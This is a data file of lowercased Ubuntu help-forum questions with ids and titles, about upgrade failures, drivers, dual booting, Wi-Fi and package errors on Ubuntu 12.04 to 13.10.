369579	why is my system freezing when i switch users	hello i 've recently upgraded from 13.04 to 13.10 64bit . i 'm running amd graphics with the proprietary drivers . i have two user accounts . mine ( administrator ) and my girlfriend 's ( standard ) my girlfriend clicks `` switch user '' from my lock screen and logs in fine . i then try to click `` switch user '' from her lock screen and everything goes black . then the monitor blinks on and off with just a single cursor . i have no way to access the terminal , the system is unresponsive and i have to hit the power button . even ctrl + alt + f4 or ctrl + alt + t does n't get me a terminal . when i press the power button on my system , it does start printing out the shutdown sequence on the monitor . here is my .xsession-errors script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . here is hers : init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped init : logrotate main process ( 4726 ) killed by term signal init : upstart-dbus-session-bridge main process ( 4865 ) terminated with status 1 init : gnome-settings-daemon main process ( 4843 ) terminated with status 1 init : gnome-session main process ( 4852 ) terminated with status 1 init : unity-panel-service main process ( 4863 ) killed by kill signal i found some advice in a forum to look for at-spi2-registryd in my system logs . perhaps it will be useful . executing this : sudo grep -r at-spi2-registryd /var/log/* produces this : /var/log/lightdm/x-1-greeter.log : ** ( at-spi2-registryd:4384 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files /var/log/lightdm/x-1-greeter.log : ** ( at-spi2-registryd:4384 ) : warning ** : unable to register client with session manager /var/log/lightdm/x-2-greeter.log.old : ** ( at-spi2-registryd:7447 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files /var/log/lightdm/x-2-greeter.log.old : ** ( at-spi2-registryd:7447 ) : warning ** : unable to register client with session manager /var/log/lightdm/x-0-greeter.log : ** ( at-spi2-registryd:1378 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files /var/log/lightdm/x-0-greeter.log : ** ( at-spi2-registryd:1378 ) : warning ** : unable to register client with session manager /var/log/lightdm/x-0-greeter.log.old : ** ( at-spi2-registryd:1357 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files /var/log/lightdm/x-0-greeter.log.old : ** ( at-spi2-registryd:1357 ) : warning ** : unable to register client with session manager here are my logs lightdm logs : lightdm.log x-0-greeter.log x-0.log x-1-greeter.log x-1.log x-2.log any ideas what is going on ?
369580	how do we install php extensions for phoronix test suite ?	the phoronix-test-suite package provides a good way to benchmark one 's hardware . after installation using software centre on ubuntu 13.10 saucy salamander , the package does not run properly . the following message appears : the following php extensions are required by the phoronix test suite : json php json support is required for openbenchmarking.org communication . the following php extensions are optional but recommended : pcntl php pcntl is highly recommended as it is required by some tests . curl php curl is recommended for an enhanced download experience . php fpdf php fpdf is recommended if wishing to generate pdf reports . how do we install the above extensions ? according to the phoronix website , the only requirements for the .deb file are : php5-cli though this package is installed , the test suite will not run .
369581	why do ppas get errors after an upgrade ?	i have a question ? ? after upgrading to a newer version of ubuntu every time for some time i have problems with getting software from launchpad . so i have a question why does that happens why does ubuntu can not use a file that previous version of ubuntu could , and why does not every dev adds support from the day one ? ? is it a lot of work to make it run on a new ubuntu ? ? ? thank you for your answers
369582	can not start virtualbox vm 's : kernel driver is not installed	i 'm a linux novice was running 12.04 with virtualbox 4.2 . everything was rosie . upgraded to 12.10 ; now virtualbox will run , but can start any vm 's . get error 'kernel driver not installed ' i 've ran /etc/init.d/vboxdrv setup but get error 'your kernel headers for kernel 3.8.0-32-generic can not be found' i tried running apt-get linux-headers-3.8.0-32-generic but get error 'pakcage linux-headers-3.8.0.32-generic is not available , but is referred to by another package ' . uname -r responds with 3.8.0-32-generic ls /usr/src contains linux-headers-3.5.0-42 ; linux-headers-3.5.0-42-generic & vboxhost-4.3.0 how do i resolve this ? i now understand i should have installed dkms before performing the os upgrade and kernel headers would have been updated .
369584	booting ubuntu with a usb without cd-rom detection	i am using the unetbootin application to create a bootable usb for ubuntu 12.04 lts . however , when booting the server the installer menu wants to detect and mount the cd-rom , which i do n't have . so the installation fails , because it will not get pass the cd-rom . how do i and what do i change to skip/override the detection of the cr-rom and continue to use the usb to build the ubuntu 12.04 server lts ? and please be specific , i am learning ubuntu / linux nomenclature so i am no where close to an expert on the linguistics . sheriff
369585	ubuntu server 12.10 sleeps ?	i 've installed ubuntu server 12.10 on my dell sc1425 to work just with command prompts and no more : the use of this machine is to convert videos and upload them to amazon web services via a shell script . i 've noticed the system seems to ... hang after a certain amount of time and it 's woke up only by pressing some keys on the keyboard causing nasty delays on the uploading process . is there a way to avoid this ? i do n't care for energy or whatsoever ; i just want the server only to be always up and running at full capacity and speed . have i to deal with acpi or something like these ? thanks to all the kind replies .
369590	how to install that nvidia 331.45 version ... . nvidia newly released nvidia 331.45 version updated drive.. now in my pc nvidia 319 updated drive	i'am a windows user . recently i now am switched in ubuntu 13.10.. it 's is every thing new for me ... commanding and setting whatever it is every thing new for me.. and now my pc monitor resolution is not set . i have a nvidia graphics card.. soo it 's is compalsary set that resolution setting how i don ; t know how to set that settings ... . i'am also updated ubuntu 13.10 current graphic drive setting ... but in nvidia newly released nvidia 331.45 version updated drive.. now in my pc nvidia 319 updated drive .. how to install that nvidia 331.45 version
369591	windows 8 uefi ssd	i have a new pc with a 128gb ssd , it has windows 8 installed with uefi . it is a quadcore x4 amd chip . i am attempting to install kubuntu 13.10 64 on the machine via a usb powered dvd reader . i followed various instructions i found on the site . i can turn off via the boot menu ( f2 ) the secure boot , i have also the options to choose uefi os or csm os or csm & uefi os , i choose boot from dvd , but no matter what combination of options i choose , the dvd boots up , the kubuntu image comes and glows and then a list of things zip past too fast to see ... ..and nothing else happens , the dvd is not accessed , nothing . as i do not want win 8 at all , could i use gparted and wipe out the disk and then install to a blank drive with the dvd or does uefi do something else and things are locked down ? thanks for any help . drew
369592	kazam screencaster installation	installation : ( 12.04 ) sudo add-apt-repository ppa : kazam-team/stable-series sudo apt-get update sudo apt-get install kazam after installation , some of the subtitles are japanese characters appear . how can get one useable kazam ?
369595	how to upgrade ubuntu step by step	i try to upgrade my ubuntu 12.04 to 13.04 ( or upper why not ) . i read in release notes that i should first upgrade to 12.10 before 13.04 . but when i use the update-manager -d command , the program purposes to install only the release 14.04 . how can i chose the target version ? ( i tried to upgrade to 14.04 but i had an error message : w : impossible de récupérer http : //extras.ubuntu.com/ubuntu/dists/trusty/main/source/sources 404 not found , w : impossible de récupérer http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : le téléchargement de quelques fichiers d'index a échoué , ils ont été ignorés , ou les anciens ont été utilisés à la place . )
369597	password screen after wake up forgets keyboard layout	i have colemak as my default layout . it used to be my only layout , but recently it has started reverting to qwerty . upon checking settings , it still says it 's colemak . as it sometimes does this when the screen is blank and there 's no way to fix my layout from the password screen i get when i wake it up , i 've added another english layout , which provides a button on the password screen -- unless i need it . if it decides to be qwerty , the layout button disappears and i have to peck out my password in qwerty . is there a way to fix at least part of this problem ? is there a way i can explain it better ? update : i discovered that when my keyboard layout disappears , i can click `` change user '' which brings me to the log-in screen . there , the keyboard layout is automatically restored . i can then type in my password normally and log in . i shall have to try that sometime when i have programs running to see if it closes the programs when i click the `` change user '' button .
369606	mbr accidentally deleted , how to restore partition	i know that my question can be a duplicate , but i spent a lot of time with google and askubuntu , but couldnt find answer . i installed ubuntu 13.10 alongside windows 7 ( i had c drive of 100gb and d drive of 200gb ) . while installing , i allocated 80gb for ubuntu from d drive . so after installation i couldnt boot into windows . using tools gparted , ubuntu boot repair and testdisk i tried to repair boot but ( as i guess ) removed smth important from sda ... so after restart i have grub rescue prompt . all partitions are unknown filesystem . i tried to boot into liveusb ubuntu 13.10 ... as i had windows partition on sda1 , and linux-swap on sda2 ... and 130gb unallocated memory ( as i guess its d drive ) ... i have a lot of important information on d drive . so how i can recover partition ? any help be appriciated !
369609	dual boot ubuntu 13.10 and windows 8.1	i installed ubuntu 13.10 on a samsung np300ec5 running windows 8.1 after disabling `` secure boot '' after installation no windows items appeared in grub menu . i ran bootrepair , that told me `` everything ok '' . after reboot no way to run windows : all windows items execute windows repair without success . output of boot repair at http : //paste.ubuntu.com/6342469/ any suggestion ?
369610	package unable to install or remove or update	i 'm unable to install or update or remove any packages ion ubuntu 12.04 . the error when i try to update via update manager is as follows in the url http : //pastebin.com/3ekcfbdd please lem me know how do i set it alright .i do n't want to reinstall since there are lots of applications that i have downloaded and i do n't prefer to re-download all of it again . i tried for the update manager , apt-get upgrade , and even synaptic .. nothing helped . dpkg -- configure -a gave me setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : install-info please help
369611	shutdown incomplete when the lid is closed after pressing shutdown	i press shutdown button and if the lid is closed before the shutdown process end , this one resumes after i reopen the lid
369612	alt-tab ( suddenly ? ) disabled in root account on gnome classic ( with/without effects )	it appears that alt-tab does not work correctly in atleast gnome classic and gnome classic without effects in the root account . in gnome classic , alt-tab does not initate any execution . the alt key underlines the menu items in a window and the tab key fails to do anything . in gnome classic without effects , alt-tab does not function correctly . it brings up the standard alt-tab switcher window ( not the ccsm one ) but the window does not contain all of the windows opened on the desktop . instead it contains just the window with the highest z-order . when executing alt-tab on the desktop , instead of a greyed out panel , the panel is filled with the desktop itself . in some instances the panel is filled with the highest z-order window and the desktop . either way , the functionality is clearly malfunctioning . i do not wish to use the ccsm application switcher . i wish to use the standard application switcher ( the one that is similar to the windows application switcher ) . there is no effect to enabling the keybinding of `` switch application '' in gconf-editor along the metacity package . please do not discuss the suitability or recommendations regarding running root .
369613	how to troubleshoot slow shutdown ?	when i shutdown my computer there is some annoying delay , it takes about 5-10 seconds in 13.10 when in the previous version it was almost instantaneous . during shutdown i press escape to cancel the splash screen and can see that a big part of the delay is after `` asking all remaining process to terminate ... '' , and then there is `` killing all remaining processes '' . i have filmed the process with my video camera to check which processes had to be killed , but they did n't chat anything to the terminal . i previously had this same issue in 11.10 , and i resolved it as answered here , however this did not work for me in 13.10 . how to identify the cause of delays in the shutdown process , and fix them ?
369614	my laptop is unable to boot any operating system	i have hp g- series laptop which was 2 years old . my laptop has two os ubuntu and windows7 home basic but ubuntu boots . my windows7 was very slow so i wanted to run my recovery disk.in the middle of that recovering process there was sudden power cut so i have no battery backup so laptop did shut-down . after when i on my laptop there written that `` no partition found grub rescue `` . after that i wanted to run my disk again but when i pause my start-up there was no bios set-up . i read some answer from u that there was a direct way to boot by pressing f9 or f10 . after that ubuntu did boot i select ubuntu it started but screen remain unchanged with written ubuntu in the middle . i did this again with windows 7 there was also same happened that the screen remain unchanged with written `` starting windows '' . also i tried with ubuntu live disk same thing happened in screen . i am not getting any solution please help me and i m waiting your answer ... ... ..
369615	possibly to boot an already installed ubuntu into windows ?	this may be answered elsewhere but most of the questions seem to concern a normal dual boot scenario . i have a standard windows 8/ubuntu 13.10 dual boot , i 'm wondering if i can boot ubuntu from inside windows using a vm . i know i could install vm with ubuntu on it , but since i already have ubuntu installed i 'm wondering if it can simply boot that partition for me .
369616	problem installin vala 0.15.0 gobobject not found	/gir/bug651773 : fail error : package `glib-2.0 ' not found in specified vala api directories or gobject-introspection gir directories error : package `gobject-2.0 ' not found in specified vala api directories or gobject-introspection gir directories generation failed : 2 error ( s ) , 0 warning ( s ) 1 of 145 tests failed make [ 4 ] : *** [ check-tests ] error 1 make [ 4 ] : leaving directory `/home/suman/downloads/vala-0.15.0/tests' make [ 3 ] : *** [ check-am ] error 2 make [ 3 ] : leaving directory `/home/suman/downloads/vala-0.15.0/tests' make [ 2 ] : *** [ check ] error 2 make [ 2 ] : leaving directory `/home/suman/downloads/vala-0.15.0/tests' make [ 1 ] : *** [ check-recursive ] error 1 make [ 1 ] : leaving directory `/home/suman/downloads/vala-0.15.0' make : *** [ check ] error 2
369617	relinux no default or ui configuration problem	i installed ubuntu 12.04 and make some customization . then i try to make iso using relinux however when i boot new iso it says no default or ui configuration error i installed first ubuntu 12.04 in vmware fusion . used relinux of course on vmware fusion . tried to boot new iso again with vmware fusion . any help would be appreciated
369619	broadcom sta wireless drive installation problem	i have installed linux in my machine but have problems setting up my wireless connection.. ; here are the steps i did 1.trying to install `` broadcom sta wireless driver '' 2.error - to view the log file , 3.tried few other links in the website to similar error nothing to avail , not sure if this error is specific to my machine.. tail -f /var/log/jockey.log 2013-11-01 14:10:20,420 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:10:20,458 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,834 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,859 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,892 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:14,142 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:18,339 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-11-01 14:16:18,340 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:16:18,373 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted lspci 2013-11-01 14:10:20,420 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:10:20,458 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,834 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,859 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,892 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:14,142 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:18,339 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-11-01 14:16:18,340 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:16:18,373 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted sudo lshw -c 2013-11-01 14:10:20,420 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:10:20,458 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,834 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,859 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:10:22,892 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:14,142 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-11-01 14:16:18,339 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-11-01 14:16:18,340 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-11-01 14:16:18,373 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted rfkill list all does n't return anything..
369621	how to get the onscreen keybord to apper on login	i am using lubuntu 13.10 and i have missing keys on my keyboard . i am using a friend keyboard currently and i want to know how to get the onscreen keyboard to appear on the login screen so i can use my laptop anywhere .
369622	i missed my data in ubuntu	sir , i have recently installed ubuntu and thought of having windows 7 along with it . but , after installation , somewhere i missed the chance of getting dual boot option and got ubuntu installed . it 's ok . but , main problem is , i have lost my previous data that was in windows7 . i need my data back and want to have dual boot as well . please help me . i even ca n't divert my pc to run on bootable devices like , usb drives and dvds those having .exe . please let me know , how to use my recovery dvd and get the data . in fact , i liked ubuntu interface and want it to have . but , i need my files too..
369624	unable to transfer data to or from mounted hard drive	so usually i 'm good at sorting out issues . but this one has me at a loss ! this issues has occured since upgrading my ubuntu so this was workingg prior . i use mounted hard drives to manage my downloads which are then copied over accordingly by a python based app . i found it was having issues with permissions to create anything on these mounted hard drives . i 'm able to play and access he content of these drives so they 're not faulty . my mount script looks like the following rw , user , exec , auto i really am stuck . could anyone shed any light on how to fix this and allow me to access it . i 've checked the properties and all groups should have read and write access so i 'm very confused ! thanks , edit here 's the output of my mount options /dev/sda2 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /sys/firmware/efi/efivars type efivarfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda1 on /boot/efi type vfat ( rw ) /dev/sdc1 on /mnt/tv type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sdb1 on /mnt/b88a30e88a30a4b2 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=simon ) /dev/sdd1 on /media/simon/new volume3 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) the main mount in question is /dev/sdc1 on /mnt/tv type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) heres my dmesg output . i tried cchanging permissions in a terminal and i got an io error . http : //paste.ubuntu.com/6346412/
369625	getting a 404 when using the nexus 7 installer ppa , how do i fix this ?	ubuntu 13.10 sudo add-apt-repository ppa : ubuntu-nexus7/ubuntu-nexus7-installer ok sudo apt-get update w : не удалось получить http : //ppa.launchpad.net/ubuntu-nexus7/ubuntu-nexus7-installer/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : не удалось получить http : //ppa.launchpad.net/ubuntu-nexus7/ubuntu-nexus7-installer/ubuntu/dists/saucy/main/binary-i386/packages 404 not found
369627	why ubuntu appears in boot options after i uninstall it ?	i 'm new in this forum ; i 've got an asus s56 laptop with windows 8 installed and uefi bios ; i have to use ubuntu to work , so i installed it on an external hard drive ; few days ago i had to uninstall ubuntu , and when i entered the boot menu i realised that maybe i installed the boot loader in windows hard disk , because in the boot list there is the ubuntu option ; if i try to boot from it , the grub does n't find the partition ( and this is what i expect , because ubuntu was on an external disk ) ; somebody on this forum suggested to delete the directory efi/ubuntu , but i do n't find it in my efi partition ; so , the question is : how can i delete the unused boot option without making mistakes ? thanks and sorry for the errors , i 'm from italy
369630	can not connect to wifi with authentication wpa2-psk and encryption tkip/aes	i have tp-link modem which has wifi . but i can not connect to this modem on my lubuntu . it asks for password while i have entered it correctly . this is my log nov 1 22:44:57 nadir-ao722 wpa_supplicant [ 900 ] : wlan0 : trying to associate with f4:3e:61:09:8e:05 ( ssid='home ' freq=2442 mhz ) nov 1 22:44:57 nadir-ao722 kernel : [ 3701.763201 ] wlan0 : authenticate with f4:3e:61:09:8e:05 nov 1 22:44:57 nadir-ao722 kernel : [ 3701.763945 ] wlan0 : send auth to f4:3e:61:09:8e:05 ( try 1/3 ) nov 1 22:44:57 nadir-ao722 kernel : [ 3701.766539 ] wlan0 : authenticated nov 1 22:44:57 nadir-ao722 kernel : [ 3701.769151 ] wlan0 : associate with f4:3e:61:09:8e:05 ( try 1/3 ) nov 1 22:44:57 nadir-ao722 wpa_supplicant [ 900 ] : wlan0 : associated with f4:3e:61:09:8e:05 nov 1 22:44:57 nadir-ao722 kernel : [ 3701.777106 ] wlan0 : rx assocresp from f4:3e:61:09:8e:05 ( capab=0x411 status=0 aid=2 ) nov 1 22:44:57 nadir-ao722 kernel : [ 3701.777729 ] wlan0 : associated nov 1 22:44:57 nadir-ao722 kernel : [ 3701.788074 ] wlan0 : disassociated from f4:3e:61:09:8e:05 ( reason : 14 ) nov 1 22:44:57 nadir-ao722 wpa_supplicant [ 900 ] : wlan0 : wpa : 4-way handshake failed - pre-shared key may be incorrect nov 1 22:44:57 nadir-ao722 wpa_supplicant [ 900 ] : wlan0 : ctrl-event-disconnected bssid=f4:3e:61:09:8e:05 reason=14 nov 1 22:44:57 nadir-ao722 kernel : [ 3701.808244 ] wlan0 : deauthenticating from f4:3e:61:09:8e:05 by local choice ( reason=3 ) nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > disconnected nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > activation ( wlan0/wireless ) : disconnected during association , asking for new key . nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'supplicant-disconnect ' ) [ 50 60 8 ] nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > disconnected nov 1 22:44:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > inactive nov 1 22:46:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : device state change : need-auth - > failed ( reason 'no-secrets ' ) [ 60 120 7 ] nov 1 22:46:58 nadir-ao722 networkmanager [ 791 ] : < warn > activation ( wlan0 ) failed for connection 'home' nov 1 22:46:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] nov 1 22:46:58 nadir-ao722 networkmanager [ 791 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ]
369635	ver 12.04 does not install on proline notebook	trying to install ver 12.04 from a cd onto a proline notebook ( m54se ) the system starts to install , but comes up with error . [ 55.095664 ] buffer i/o error on device zram0 . logical block 55189 . what am i doing wrong ?
369636	lenses are missing after upgrading to 13.10	after upgrading from 13.04 to 13.10 all unity dash lenses except for social networks are missing . see the screen-shot here : i tried purging and reinstalling but did n't help .
369637	problem with upgrading a package	i 've added some ppas then i did sudo apt-get update & & sudo apt-get upgrade after that there was some packages was n't installed so i did sudo apt-get dist-upgrade after that i had a problem here and it did not solved at all i tried sudo dpkg -- configure -a sudo apt-get -f install sudo apt-get update & & sudo apt-get upgrade and nothing solved . any help ?
369638	ubuntu default login problem	i have installed ubuntu 13.10 and it was a little bet heavy on my 1 gb ram mini notebook , so i went on to cinnamon and installed gnome classic as well , i observed that i could not log in to defalt unity desck top , when i write my password on that scerrn it blinck and a black screen comes on as if it will enter me into it then it return back to log in screen again without any understanding as if the system is mad of me using cinnamon . any help please ?
369639	dual boot on xps 15	i am considering purchasing a dell xps 15 ( http : //www.dell.com/us/p/xps-15-l521x/pd ? oc=dncwx16bw7 & model_id=xps-15-l521x ) intel® core™ i7-3632qm processor nvidia® geforce® gt 640m with 2gb gddr5 vram 750gb 7200 rpm sata hard drive + 32gb msata solid state drive i plan on dual booting windows and ubuntu . i 'd like to keep windows around to play some games on the laptop , but i plan on primarily using ubuntu as my workstation . what is the easiest way to setup a dual boot for this setup ? do i have to worry about uefi e.g . ( https : //help.ubuntu.com/community/uefi ) ? which ubuntu should i install ? what other problems should i look out for ? links to guides would be appreciated ! edit : looks like the 32gb msata sdd is used as a cache device for the most frequently accessed data for faster access using the intel smart response technology . is ubuntu able to take advantage of this system ? similar question : http : //superuser.com/questions/459578/ubuntu-on-an-xps-14-ultrabook-with-msata-cache-and-500gb-hd-how-to-partition-f
369641	hide all normal windows shortcut is not working in ubuntu 13.10	hide all normal windows shortcut is not working . it is currently set to alt+ctrl+d . and changing the shortcut does n't help ( tried super+d , alt+esc ) . however other shortcuts work fine ( even from the same navigation tab ) . i guess the question is a duplicate of this which is unanswered . update : it works exactly one time after reboot . i can minimize windows and even bring them back using the combination but only once . also switching keyboard layout shortcut stopped working , but as i can see it 's a known bug .
369642	lubuntu13.10 - no wireless	this is my first time using linux and i am having difficulties with my wireless . the network manager does not show any wireless network options , nor does the wlan led light up on my laptop . i searched the internet for sollutions and i tried a few terminal commands to fix wlan somehow , neither did work . here is my lspci output if it helps : 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rs480/rs482/rs485 host bridge ( rev 10 ) 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci bridge [ int gfx ] 00:04.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 1 00:05.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 2 00:06.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 3 00:12.0 ide interface : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 serial ata controller ( rev 80 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb host controller ( rev 80 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb host controller ( rev 80 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb2 host controller ( rev 80 ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 smbus controller ( rev 82 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 ide controller ( rev 80 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-pci bridge ( rev 80 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs482m [ mobility radeon xpress 200 ] 02:01.0 ethernet controller : broadcom corporation netxtreme bcm5788 gigabit ethernet ( rev 03 ) 02:04.0 cardbus bridge : texas instruments pcixx12 cardbus controller 02:04.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 02:04.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 02:04.3 sd host controller : texas instruments pcixx12 sda standard compliant sd host controller 30:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 )
369644	can i delete partitions of an ssd drive ?	i have an ssd which is installed with windows 8 and uefi . my main concern is that gparted might not be able to get rid of the hidden partitions sda1 , 5 , 6 and i 'll be left with some kind of legacy uefi problem . assuming i can delete them , i just install kubuntu 13.10 64bit as normal ?
369645	trying to boot with ubuntu but it stars with windows xp	so i have a windows xp computer and i installed ubuntu windows installer , and when the installation was ready i rebooted my computer but it starts with xp . i tried to go to boot menu but ubuntu does n't show in there . how can i get ubuntu working ?
369646	create a shortcut key to toggle airplane mode on/off	i want to create a shortcut key that toggles airplane mode on/off , but do not know what command to use . to create a shortcut i go to settings > keyboard > shortcuts and then specify a command to be run whenever a given accelerator ( shortcut key ) is activated . what command should be specified here to toggle airplane mode via a shortcut key ? note that a while ago i asked a similar question , but the answer that i got back then can not be applied here , since a shortcut key command can not change between `` on '' and `` off '' , but should truly toggle the airplane mode not just activate or deactivate it .
